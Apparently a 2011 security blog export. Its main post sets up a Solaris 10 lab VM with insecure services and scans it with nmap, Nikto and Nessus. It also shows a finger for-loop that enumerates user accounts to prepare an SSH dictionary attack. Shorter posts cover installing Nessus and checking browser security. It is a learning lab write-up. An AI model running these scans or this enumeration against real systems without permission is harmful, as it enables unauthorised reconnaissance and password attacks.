(You need to register with Oracle to download these images)<br />
<br />
<br />
<b>Setting up a Solaris box</b><br />
<br />
Once the Solaris10_9-10_VM.zip image is downloaded, unpack it with:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">unzip Solaris10_9-10_VM.zip</span><br />
<br />
Start VirtualBox, and import the appliance with:<br />
<br />
File > Import > select the *.ovf file (and follow the rest of the menu)<br />
<br />
Once this is imported you can start the VM and you will get to the following Solaris setup menu.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI2ogJvzl6m6mRBTwob1HXl-DZHMWjoLKX68lYEtICx-QY8yaem90xNcwjpcfGx2CODYB4_E2nqCztSBIW3XhSDLJo1tQsTDF8shCE0OPwuhbZwoY9q9lXU84hEu06dzNYkWil_B2xnuo/s1600/solaris1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI2ogJvzl6m6mRBTwob1HXl-DZHMWjoLKX68lYEtICx-QY8yaem90xNcwjpcfGx2CODYB4_E2nqCztSBIW3XhSDLJo1tQsTDF8shCE0OPwuhbZwoY9q9lXU84hEu06dzNYkWil_B2xnuo/s400/solaris1.png" width="400" /></a></div><div style="text-align: center;">(Use F2 and F4 to continue through the menus)</div><br />
Work through these menus, and in around 20 minutes you will be able to login, and will have a working Solaris system:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22koh8KQKejUcM1A6LeqhkrftVDRfoKf4luKTaN02gebMT2UxhpK2rB56rhtdFqNagslHENdQRoLvPrMsWbqwfQhrRHbWmPqqirwVB_5eIXUPYq9NKyAhSgp9s_dNAlXPFVY-3cmwpus/s1600/solaris3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22koh8KQKejUcM1A6LeqhkrftVDRfoKf4luKTaN02gebMT2UxhpK2rB56rhtdFqNagslHENdQRoLvPrMsWbqwfQhrRHbWmPqqirwVB_5eIXUPYq9NKyAhSgp9s_dNAlXPFVY-3cmwpus/s400/solaris3.png" width="400" /></a></div><div style="text-align: center;">(Mmmm... lovely; dull grey and purple)</div><br />
<br />
<b>Managing services</b><br />
<br />
Solaris services are managed differently from services in Linux, by using the "svcadm" tool.<br />
So to go ahead and setup some extra services and scan the system:<br />
<br />
To set up an apache webserver:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">cd /etc/apache2</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">cp httpd.conf-example httpd.conf</span><br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">svcadm -v enable /network/http:apache2</span><br />
<br />
.. and check it's running:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">svcs -p /network/http:apache2</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">STATE STIME FMRI</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">online 10:51:52 svc:/network/http:apache2</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:52 1991 httpd</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:53 1992 httpd</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:53 1993 httpd</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:53 1994 httpd</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:53 1995 httpd</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:53 1996 httpd</span><br />
<br />
Let's also start some other (unnecessary and potentially insecure) services, to expand our target a bit:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">svcadm enable network/telnet</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">svcadm enable network/ftp</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">svcadm enable network/finger</span><br />
<br />
<br />
<b>Scanning with nmap</b><br />
<br />
First lets try a basic scan:<br />
<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nmap 192.168.1.69</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-08-29 19:28 BST</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Nmap scan report for 192.168.1.69</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Host is up (0.00052s latency).</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Not shown: 994 closed ports</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">PORT STATE SERVICE</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">21/tcp open ftp</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">22/tcp open ssh</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">23/tcp open telnet</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">79/tcp open finger</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">80/tcp open http</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">111/tcp open rpcbind</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">MAC Address: 08:00:27:33:49:19 (Cadmus Computer Systems)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Nmap done: 1 IP address (1 host up) scanned in 27.71 seconds</span><br />
<br />
<br />
So we can see the services I added there, also it looks like ssh (and rpcbind) had been enabled by default.<br />
<br />
Now for a more thorough scan using the NSE scripts<br />
<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nmap --script all 192.168.1.69</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-08-29 19:23 BST</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: x-small;">Nmap scan report for 192.168.1.69</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Host is up (0.0010s latency).</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Not shown: 994 closed ports</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">PORT STATE SERVICE</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">21/tcp open ftp</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ftp-bounce: no banner</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">22/tcp open ssh</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_banner: SSH-2.0-Sun_SSH_1.1.3</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| ssh-hostkey: 1024 78:af:4e:c7:67:0e:18:9b:da:77:c4:6d:c0:a7:1b:7d (DSA)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_1024 a5:92:ed:16:f5:fc:26:8b:18:d4:5e:b5:9d:0c:21:3b (RSA)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">23/tcp open telnet</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">79/tcp open finger</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">80/tcp open http</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| http-brute: </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ ERROR: No path was specified (see http-brute.path)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">| http-methods: Potentially risky methods: TRACE</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_See http://nmap.org/nsedoc/scripts/http-methods.html</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_http-trace: TRACE is enabled</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_http-date: Mon, 29 Aug 2011 18:24:32 GMT; +1s from local time.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| http-headers: </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Date: Mon, 29 Aug 2011 18:24:34 GMT</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Server: Apache/2.0.63 (Unix) DAV/2</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Content-Location: index.html.en</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Vary: negotiate,accept-language,accept-charset</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| TCN: choice</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Last-Modified: Sun, 21 Nov 2004 14:35:21 GMT</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| ETag: "4614-5b0-a64a7c40;462a-961-a64a7c40"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Accept-Ranges: bytes</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Content-Length: 1456</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Connection: close</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Content-Type: text/html</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Content-Language: en</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ (Request type: HEAD)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| http-form-brute: </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ ERROR: No passvar was specified (see http-form-brute.passvar)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_http-title: Test Page for Apache Installation</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_http-wp-plugins: nothing found amongst the 100 most popular plugins, use --script-arg http-wp-plugins.search=<number|all> for deeper analysis)</number|all></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| http-domino-enum-passwords: </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ ERROR: No valid credentials were found (see domino-enum-passwords.username and domino-enum-passwords.password)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">111/tcp open rpcbind</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">MAC Address: 08:00:27:33:49:19 (Cadmus Computer Systems)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Host script results:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_dns-brute: Can't guess domain of "192.168.1.69"; use dns-brute.domain script argument.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_path-mtu: PMTU == 1500</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ipidseq: Unknown</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| qscan: </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| PORT FAMILY MEAN (us) STDDEV LOSS (%)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 1 0 732.20 508.23 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 21 0 1143.80 853.92 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 22 1 1236.80 734.74 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 23 1 1248.10 782.83 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 79 0 1065.30 794.20 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 80 1 1297.50 742.94 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_111 1 1577.30 1092.91 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Nmap done: 1 IP address (1 host up) scanned in 118.38 seconds</span><br />
<br />
That didn't find a great deal extra except that the TRACE option is also enabled, which means that XST (cross-site tracing, a client-side attack) is potentially possible against old browser versions (though this attack is no-longer possible against the majority of modern browsers).<br />
<br />
The SSH banner also reveals that we have a Solaris system.<br />
<div><br />
</div><br />
<div><br />
</div><div><b>Scanning with Nikto</b><br />
<br />
We can scan the webserver with Nikto using the following command:</div><div><br />
</div><div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">./nikto.pl -host 192.168.1.69</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">- Nikto v2.1.4 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">--------------------------------------------------------------------------- </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Target IP: 192.168.1.69 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Target Hostname: 192.168.1.69 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Target Port: 80 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Start Time: 2011-08-30 19:59:48 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">--------------------------------------------------------------------------- </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Server: Apache/2.0.63 (Unix) DAV/2 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><span class="Apple-style-span" style="color: #cc0000;">+ Apache/2.0.63 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. </span> </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST </span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-2117: /: Appears to be a default Apache install. </span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3092: /manual/: Web server manual found. </span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3233: /index.html.ca: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">... etc ...</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3233: /index.html.var: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3268: /icons/: Directory indexing found.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3268: /manual/images/: Directory indexing found.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3233: /icons/README: Apache default file found.</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ 6448 items checked: 2 error(s) and 36 item(s) reported on remote host</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ End Time: 2011-08-30 20:01:05 (77 seconds)</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ 1 host(s) tested</span></div></div><div><br />
</div><div>As you can see, there is various default content there from my Apache install (this should all be removed in a production website, to prevent attackers from gaining extra information. Additionally we can see that we have an old version of Apache.</div><div></div><br />
<br />
<br />
<b>Scanning with Nessus</b><br />
<br />
Now for a scan with Nessus to see what that can see:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioerUIjMRoWK4UahN_stqZdMCSNagybYWsx1uJGwTEPoPzvjZvp_Wdc6oycN7ZoRB4yjyPLzJ7i_XItWLVD8H3daZ-fuY3NviiISknJKXMckXnLTMA1lHYcVS4r7Rl_mKXqqEe9dGneWE/s1600/solaris-nessus.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioerUIjMRoWK4UahN_stqZdMCSNagybYWsx1uJGwTEPoPzvjZvp_Wdc6oycN7ZoRB4yjyPLzJ7i_XItWLVD8H3daZ-fuY3NviiISknJKXMckXnLTMA1lHYcVS4r7Rl_mKXqqEe9dGneWE/s400/solaris-nessus.png" width="400" /></a></div><br />
In the Nessus report, there is a "High Severity" Denial of Service vulnerability for Apache.<br />
<br />
This is a fairly recent exploit that many sites and services are currently vulnerable to. More information on this vulnerability is available at the following location:<br />
<br />
<a href="http://archives.neohapsis.com/archives/fulldisclosure/2011-08/0203.html">http://archives.neohapsis.com/archives/fulldisclosure/2011-08/0203.html</a><br />
<br />
Also, there are various information disclosure issues from the other running services (FTP, Telnet, Finger, SSH) which give us OS and service versions, and username information.<br />
<br />
<br />
<b>Finger and fingerd enumeration with a basic "for" loop</b><br />
<br />
Nobody installs fingerd these days if they want to be secure (but hey, I trying to make the target bigger and practice some enumeration).<br />
<br />
Nessus found the user root using finger, but is is also possible to find other accounts. This version of the finger daemon searches the user description in addition to the username, so you can also find users via words in the description as well.<br />
<br />
Here is how to install the finger client on Backtrack and run a couple of different queries:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">apt-get install finger</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">finger root@192.168.1.69</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[192.168.1.69]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Login Name TTY Idle When Where</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">root Super-User console 2 Mon 07:55 :0 </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">root Super-User pts/3 2 Mon 08:29 :0.0 </span><br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">finger user@192.168.1.69</span><br />
<div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[192.168.1.69]</span></div><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Login Name TTY Idle When Where</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">nobody NFS Anonymous Access < . . . . ></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">noaccess No Access User < . . . . ></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">nobody4 SunOS 4.x NFS Anonym < . . . . ></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
So, if there were other users on the system, we could try a dictionary attack to find them using finger in a "for" loop.<br />
<br />
Given a list of names in "usernames.txt", we can use the following commandline for loop to iterate through them, and strip out anything found, dumping it to a file:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">for name in $(cat usernames.txt); do finger $name@192.168.1.69 | awk 'NR!=1 && NR!=2' | grep -v ??? | cut -d " " -f1 | sort -u >> foundnames.txt; done</span><br />
<div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span></div><div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">cat foundnames.txt | sort -u</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">adm</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">gdm</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">listen</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">lp</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">noaccess</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nobody</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nobody4</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nuucp</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">postgres</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">root</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">smmsp</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">svctag</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">uucp</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">webservd</span></div></div><div><br />
</div><div>This could be a useful enumeration, which might make a dictionary attack against SSH (for example) a lot quicker.</div><div><br />
</div>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com9tag:blogger.com,1999:blog-6428740549041097500.post-46289618060181523562011-08-29T10:24:00.003+01:002011-09-03T23:08:03.014+01:00Setting up Nessus in Backtrack 5 R1In an earlier post I described how to setup Nessus on Backtrack 5:<br />
<br />
<a href="http://insidetrust.blogspot.com/2011/05/easy-nessus-scan-for-beginner-with.html">http://insidetrust.blogspot.com/2011/05/easy-nessus-scan-for-beginner-with.html</a><br />
<br />
For some reason, BT 5 R1 does not come with Nessus installed by default, but it's easy to download and install.<br />
<br />
You will need to download Nessus from the following location:<br />
<br />
<a href="http://www.tenable.com/products/nessus/select-your-operating-system">http://www.tenable.com/products/nessus/select-your-operating-system</a><br />
<br />
(I used the Debian 64 bit package)<br />
<br />
Then install it with the following command:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">dpkg -i Nessus-4.4.1-debian5_amd64.deb</span><br />
<br />
Then you can simply follow the rest of the instructions in my <a href="http://insidetrust.blogspot.com/2011/05/easy-nessus-scan-for-beginner-with.html">original post</a>.<br />
<br />
<span style="color: #cc0000;">Update</span> - Of course, there is an easier way to do this ;o)<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">apt-get install nessus</span><br />
<br />
Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com22tag:blogger.com,1999:blog-6428740549041097500.post-8790452624496736732011-08-28T19:37:00.002+01:002011-08-28T21:37:55.760+01:00How good is your browser security?So, if you are reading this blog, you are probably interested in IT security (or insecurity, otherwise you are in the wrong place).<br />
<br />
<b>Is your browser secure?</b><br />
<br />
This is a great resource for testing browser security:<br />
<br />
<a href="https://browsercheck.qualys.com/">https://browsercheck.qualys.com/</a><br />
<br />
Run the above test on each of the browsers on your system (IE, Firefox, Chrome etc)<br />
<br />
If all is well you should get a screen which looks something like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitCI1p9tjaAkFv8u2SLyuBsJxgEeJvh00TTNgQkHFsP-dFSnkg6UBldB0uRcjEGmlU7yu0QAk0qhO-HMwh10NCyR7TCUHBZsPcusq9iCQPosj_6c3dF0QCKmPSp-oiKZicNP7iVbF2yGM/s1600/firefox-fixed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitCI1p9tjaAkFv8u2SLyuBsJxgEeJvh00TTNgQkHFsP-dFSnkg6UBldB0uRcjEGmlU7yu0QAk0qhO-HMwh10NCyR7TCUHBZsPcusq9iCQPosj_6c3dF0QCKmPSp-oiKZicNP7iVbF2yGM/s400/firefox-fixed.png" width="378" /></a></div><br />
If you get a red bar, you are not up-to-date, and probably not fully secure for browsing. If this is the case then I recommend you should to follow the on-screen instructions to get this fixed.<br />
<br />
I would be interested to see how many people pass on the first attempt, and what measures others needed to take to get up-to-date.<br />
<br />
For me, I run Backtrack 5 R1 (Linux), I needed to update Firefox, and the flash-plugin.<br />
<br />
I have added explanations of how to upgrade to Firefox 6.x and also update the Flash plugin in my "Backtrack 5 R1 notes" at the following location:<br />
<br />
<a href="http://insidetrust.blogspot.com/2011/08/backtrack-5-r1-some-things-fixed-some.html">http://insidetrust.blogspot.com/2011/08/backtrack-5-r1-some-things-fixed-some.html</a><br />
<br />
I recommend anyone who is using Backtrack 5 R1 to apply the updates to help make their system more secure.<br />
<br />
I also run chrome on this system, and my chrome status looks like this (Shockwave Flash 11.0 is currently pre-release)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNLu8mHG0AoJkmsJ8IaQRcDd-xFJGHvlJAK_Vqzaqnl7Ey9k36LiZJX_K9Zhvv9vpSAvPKTw_z1-m68wxj9A5y12LKAi0dbaXjHJUwWu-ypcgKMDzGhNIlJ98QSEiO0A-cg8i2rr_7Cps/s1600/chrome.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNLu8mHG0AoJkmsJ8IaQRcDd-xFJGHvlJAK_Vqzaqnl7Ey9k36LiZJX_K9Zhvv9vpSAvPKTw_z1-m68wxj9A5y12LKAi0dbaXjHJUwWu-ypcgKMDzGhNIlJ98QSEiO0A-cg8i2rr_7Cps/s400/chrome.png" width="400" /></a></div><br />
